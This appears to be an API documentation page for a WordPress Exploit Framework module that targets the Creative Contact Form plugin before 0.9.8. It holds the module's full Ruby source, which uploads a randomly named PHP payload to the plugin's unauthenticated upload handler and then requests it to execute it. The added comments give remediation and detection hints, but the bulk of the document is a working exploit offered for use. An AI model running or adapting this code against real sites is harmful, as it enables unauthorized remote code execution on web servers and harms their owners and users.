class Wpxf::Exploit::CreativeContactFormShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 6
#
# Sets up the module and registers its metadata (name, description, credits,
# advisory references and disclosure date) through update_info.
#
# Per the description below, the affected range is every release of the
# Creative Contact Form plugin before 0.9.8, and the flaw is reachable without
# authentication. Updating to 0.9.8 or later is therefore the remediation
# target; the EDB and WPVDB identifiers are the advisories to cross-check.
def initialize
  super

  description = 'This module exploits a file upload vulnerability in all versions '\
                'of the Creative Contact Form plugin prior to version 0.9.8 which '\
                'allows unauthenticated users to upload and execute PHP scripts '\
                'in the context of the web server.'

  credits = [
    'Gianni Angelozzi', # Vulnerability discovery
    'rastating'         # WPXF module
  ]

  advisories = [%w[EDB 35057], %w[WPVDB 7652]]

  update_info(
    name: 'Creative Contact Form Shell Upload',
    desc: description,
    author: credits,
    references: advisories,
    date: 'Oct 22 2014'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 27
#
# Version check for the plugin installed under the 'sexy-contact-form' slug.
# Delegates to check_plugin_version_from_readme and returns its result.
#
# NOTE(review): going by the helper's name, the installed version is read from
# the plugin's readme file and compared with '0.9.8', the first release the
# module description treats as not affected -- confirm against the helper.
# A readme can be removed or edited, so treat the result as an indicator
# rather than proof when using it for asset triage.
def check
  plugin_slug = 'sexy-contact-form'
  first_fixed_version = '0.9.8'
  check_plugin_version_from_readme(plugin_slug, first_fixed_version)
end
payload_body_builder(payload_name)
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 39
#
# Builds the request body for the upload request.
#
# payload_name - file name attached to the uploaded part.
#
# Returns a Utility::BodyBuilder holding one file part: form field 'files[]',
# content taken from payload.encoded, file name payload_name.
def payload_body_builder(payload_name)
  Utility::BodyBuilder.new.tap do |form|
    form.add_file_from_string('files[]', payload.encoded, payload_name)
  end
end
plugin_url()
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 31
#
# Returns the URL of the plugin's directory: the 'sexy-contact-form' slug
# joined onto wordpress_url_plugins via normalize_uri.
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'sexy-contact-form')
end
run()
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 45
#
# Runs the module: uploads the encoded payload through the plugin's file
# upload handler, then requests the uploaded file.
#
# Returns false when the superclass run fails, when the upload request gets no
# response or times out, or when the upload response is not accepted. Returns
# true once the upload response is accepted, whatever the follow-up GET returns.
#
# The upload is accepted when the status is 200 and the body contains either
# the literal text "files" or the generated file name, so a 200 page that
# merely mentions "files" also counts.
#
# Defender note: the traces visible in this method are a POST to
# includes/fileupload/index.php under the plugin directory, a new .php file
# with a random alphabetic name in includes/fileupload/files/, and a GET for
# that file. Requests to those paths and PHP files appearing in that directory
# are the things to alert on; the module description gives 0.9.8 as the first
# release outside the affected range.
def run
  return false unless super

  emit_info 'Preparing payload...'
  # presumably rand_alpha's argument is a length, giving a 5-10 letter stem
  stem = Utility::Text.rand_alpha(rand(5..10))
  payload_name = "#{stem}.php"
  form = payload_body_builder(payload_name)

  emit_info 'Uploading payload...'
  upload_response = nil
  form.create do |body|
    upload_response = execute_post_request(url: uploader_url, body: body)
  end

  if upload_response.nil? || upload_response.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # The status is tested first; the body is only inspected on a 200.
  accepted = upload_response.code == 200 &&
             upload_response.body =~ /files|#{Regexp.escape(payload_name)}/
  unless accepted
    # The trailing `true` is presumably a verbose-only flag -- confirm in emit_info.
    emit_info "Response code: #{upload_response.code}", true
    emit_info "Response body: #{upload_response.body}", true
    emit_error 'Failed to upload payload'
    return false
  end

  payload_url = normalize_uri(plugin_url, 'includes', 'fileupload', 'files', payload_name)
  emit_success "Uploaded the payload to #{payload_url}", true

  emit_info 'Executing the payload...'
  exec_response = execute_get_request(url: payload_url)
  got_output = exec_response && exec_response.code == 200 && !exec_response.body.strip.empty?
  emit_success "Result: #{exec_response.body}" if got_output

  true
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb, line 35
#
# Returns the URL of the plugin's upload handler, includes/fileupload/index.php
# beneath plugin_url. The run method POSTs to this endpoint, so on an affected
# site it is the path to restrict or monitor until the plugin is updated.
def uploader_url
  handler_path = %w[includes fileupload index.php]
  normalize_uri(plugin_url, *handler_path)
end